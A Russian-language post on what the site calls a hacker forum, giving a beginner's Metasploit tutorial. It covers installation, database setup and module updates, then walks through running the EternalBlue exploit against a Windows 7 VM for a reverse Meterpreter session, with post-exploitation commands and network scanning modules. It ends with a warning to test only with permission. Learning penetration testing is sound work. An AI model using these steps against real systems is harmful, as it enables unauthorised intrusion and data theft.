Взлом
Уважаемые гости! При посещении нашего сайта просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.п., а также при обращении за помощью просим быть внимательными: на сайте есть как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант-сервиса. Спасибо, что посетили форум хакеров.

Metasploit. Ставим, настраиваем, пробуем первый эксплойт. Рассказываю как для себя

ShadowFox

Обычный
Пользователь
Регистрация
6 Ноя 2025
Сообщения
138
Реакции
3
Баллы
18
Metasploit Настройки и установка.
hqdefault.jpg

С Metasploit у меня вышло как с гитарой. Долго смотрел со стороны, думал — вот сейчас возьму и заиграю. А когда взял в руки, оказалось, что просто так оно не звучит. Надо и струны натянуть, и аккорды выучить, и руки поставить.

С Metasploit та же история. В фильмах всё красиво: открыл консоль, вбил пару команд — и ты в системе. В реальности сначала надо подружиться с базой данных, потом модули обновить, потом найти подходящий эксплойт, да ещё и не ошибиться с пейлоадом. Я когда первый раз сел, думал, что сейчас всё полетит. А оно не летело.

Пришлось гуглить, перечитывать форумы, переставлять, ругаться. В итоге разобрался и теперь хочу рассказать, чтобы у тебя этот путь занял меньше времени.

Что за зверь и зачем он вообще нужен

Metasploit — это такая большая библиотека эксплойтов, пейлоадов и вспомогательных инструментов, собранная в одном месте. Если говорить совсем просто — это программа, которая умеет проверять, есть ли в целевой системе известные дыры, и если есть — помогать в них залезть.

Пентестеры его любят, потому что не надо писать каждый эксплойт руками. Достаточно найти подходящий, указать цель и запустить. Дальше фреймворк сам сделает свою магию.

С чего начинать

Тут у меня для тебя плохая новость: если у тебя не Kali Linux, придётся немного повозиться. На Кали всё уже стоит из коробки. На любом другом линуксе надо ставить руками.

Вторая плохая новость: Metasploit под Windows я бы не советовал. Да, он там работает, но как-то криво и с костылями. Лучше сразу ставь виртуалку с Кали и не парься.

Третья новость, уже хорошая: если у тебя Ubuntu или Debian, ставится всё одной командой:

```
sudo apt update
sudo apt install metasploit-framework
```

После этого можно вводить msfconsole и смотреть, что получилось.

База данных — без неё никак

Когда я первый раз запустил Metasploit, я даже не знал, что ему нужна база данных. Просто открыл консоль и начал тыкать эксплойты. Всё вроде работало, но через пару часов я заметил, что результаты сканирования не сохраняются, историю посмотреть нельзя, и вообще как-то неудобно.

Оказалось, Metasploit использует PostgreSQL, чтобы хранить информацию о хостах, сессиях, найденных уязвимостях. Без базы работать можно, но это как ездить на машине без зеркал — вроде едешь, но постоянно оглядываешься.

Проверить, подключена ли база, можно прямо в msfconsole:

```
db_status
```

Если пишет, что не подключена, делаем:

```
db_reinit
```

Эта команда создаст всё что надо и подключится. Если после этого статус не изменился, значит, проблема глубже. Тогда идём в системные службы и проверяем PostgreSQL:

```
sudo systemctl start postgresql
sudo systemctl enable postgresql
```

После этого пробуем снова.

Модули надо обновлять

Metasploit живёт эксплойтами. Каждый день кто-то находит новую дыру, и если не обновлять модули, твой фреймворк быстро устареет. Я один раз полдня искал эксплойт под уязвимость, которая вышла на прошлой неделе, а его не было. Потом обновил — и он появился.

Обновление делается прямо из консоли:

```
msfupdate
```

Если команда не работает, можно через пакетный менеджер:

```
sudo apt update
sudo apt upgrade metasploit-framework
```

Первый запуск и проверка

После всех настроек надо убедиться, что Metasploit видит модули и база работает.

В msfconsole вводим:

```
search type:exploit platform:windows
```

Если появился список — всё ок. Можно двигаться дальше.

Пробуем первый эксплойт

Для тренировки возьмём eternalblue. Это та самая дыра в SMB, через которую WannaCry разлетелся по миру. На современных системах она уже закрыта, но для виртуалки со старой Windows 7 самое то.

Сначала выбираем эксплойт:

```
use exploit/windows/smb/ms17_010_eternalblue
```

Потом смотрим, какие параметры нужно задать:

```
show options
```

Там будут RHOSTS — это цель, и LHOST — это твой IP, куда придёт обратное соединение.

Задаём:

```
set RHOSTS 192.168.1.100
set LHOST 192.168.1.50
```

И запускаем:

```
run
```

Если всё сделано правильно, через пару секунд должна открыться сессия Meterpreter.

Что такое Meterpreter

Meterpreter — это такая специальная оболочка, которая открывается на целевой машине после успешного эксплойта. В ней куча полезных команд:

· sysinfo — посмотреть, что за система
· getuid — под кем мы зашли
· ps — список процессов
· download — скачать файл
· upload — загрузить файл
· screenshot — снять скриншот
· shell — запустить обычную командную строку

Можно бродить по системе, собирать информацию, закрепляться.

Вспомогательные модули

Metasploit умеет не только эксплуатировать уязвимости, но и помогать с разведкой. Например, просканировать сеть на открытые порты:

```
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set THREADS 10
run
```

Или собрать информацию о Windows-машинах по SMB:

```
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
run
```

Таких модулей очень много. Можно искать открытые базы данных, проверять учётные записи, собирать баннеры веб-серверов.

Команды, которые пригодятся

· help — справка по любой команде
· search — поиск модулей по ключевым словам
· use — выбрать модуль для работы
· back — вернуться назад
· show options — показать параметры выбранного модуля
· set — установить значение параметра
· run или exploit — запустить модуль
· sessions -l — список активных сессий
· sessions -i ID — подключиться к сессии
· jobs — список фоновых задач

Мои косяки

Я через многое прошёл, пока разбирался. Рассказываю, чтобы ты не повторял.

Первый косяк. Думал, что msfconsole можно просто открыть и работать. А оно без базы данных многое не сохраняет. Пришлось переделывать.

Второй косяк. Забывал обновлять модули перед важными тестами. Искал свежий эксплойт, а его не было. Потом вспоминал про msfupdate и ругался.

Третий косяк. Пытался поставить Metasploit на Windows. Поставил, но оно тормозило и падало. Плюнул, поставил виртуалку с Кали.

Четвёртый косяк. Не проверял права на папку с модулями. Вылазили ошибки доступа, пришлось права править.

Пятый косяк. Запускал eternalblue на виртуалку, не убедившись, что она уязвима. Виртуалка повисла, пришлось перезагружать.

Шестой косяк. Использовал пейлоад не под ту архитектуру. Цель была 32-битная, а я запустил 64-битный пейлоад. Эксплойт сработал, но сессия не открылась.

Седьмой косяк. Забывал указывать LHOST. Долго тупил, почему обратное соединение не приходит.

Восьмой косяк. Думал, что msfupdate работает всегда. А оно иногда требует прав суперпользователя. Запускал без sudo, половина модулей не обновилась.

Если что-то пошло не так

База не подключается. Проверь, запущен ли PostgreSQL. Если нет, запусти и добавь в автозагрузку.

Модуль не найден. Проверь путь. Может, опечатался. Или модуль действительно старый и его убрали.

Нет прав. Запускай msfconsole от обычного пользователя, но с правильными правами на папки. Если проблема остаётся, проверь chmod.

Эксплойт не срабатывает. Может быть миллион причин. Начиная от того, что цель не уязвима, и заканчивая тем, что фаервол режет соединение. Проверяй всё по порядку.

Что почитать и посмотреть

· Официальная документация на сайте Metasploit — там всё подробно расписано.
· Книга "Metasploit: The Penetration Tester's Guide" — старая, но базовая информация не меняется.
· Канал IppSec на YouTube — он разбирает машины с HackTheBox, и Metasploit там часто мелькает.
· Reddit, разделы r/netsec и r/metasploit — там иногда всплывают полезные советы.

Ну и завершение, какой вывод можно сделать.

Metasploit — штука мощная, но с характером. Его надо кормить свежими модулями, следить за базой данных и правильно выбирать пейлоады. Зато когда он работает, это реально помогает.

Если будешь делать всё по порядку, с первого раза может и не получиться, но со второго-третьего точно въедешь. Главное — не бросать и гуглить ошибки. На каждый косяк уже есть решение на форумах.

И помни: Metasploit это инструмент для легального тестирования. Не надо долбить им по чужим серверам без разрешения. Даже если очень хочется проверить, защищён ли сайт бывшей девушки.
 
Яндекс.Метрика